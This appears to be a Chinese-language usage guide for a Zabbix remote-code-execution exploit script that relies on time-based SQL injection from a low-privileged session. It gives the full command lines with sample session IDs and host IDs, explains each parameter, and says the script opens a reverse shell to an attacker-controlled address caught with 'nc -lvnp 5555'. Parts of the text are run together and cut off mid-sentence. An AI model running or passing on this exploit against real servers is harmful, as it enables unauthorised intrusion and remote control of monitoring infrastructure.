python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
你已经发现一个运行在 IP 192.168.1.100 上的 Zabbix 服务器,并且拥有一个低权限用户的访问权限,详情如下:
sid):d82bf6715e1d3c1f25hostid):10107phpsessid):a4g7f48d9j3r7h8s9g你想使用此脚本利用该 RCE 漏洞。
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100:Zabbix 服务器的 IP 地址。--sid d82bf6715e1d3c1f25:低权限用户的会话 ID。--hostid 10107:低权限用户可以访问的主机 ID。--phpsessid a4g7f48d9j3r7h8s9g:用于验证请求的 PHP 会话 ID。--false_time 1:SQL 注入猜测错误时休眠的秒数(默认为 1 秒)。--true_time 3:SQL 注入猜测正确时休眠的秒数(默认为 3 秒)。10.0.46.27:5555)。确保你的机器正在监听指定的端口(脚本中为 5555)以捕获反弹 shell。你可以使用 netcat:
nc -lvnp 5555
将 CreateScript 函数中的 IP 10.0.46.27 和端口 5555 替换为你自己的 IP 和希望使用的端口,以便接收反弹 shell。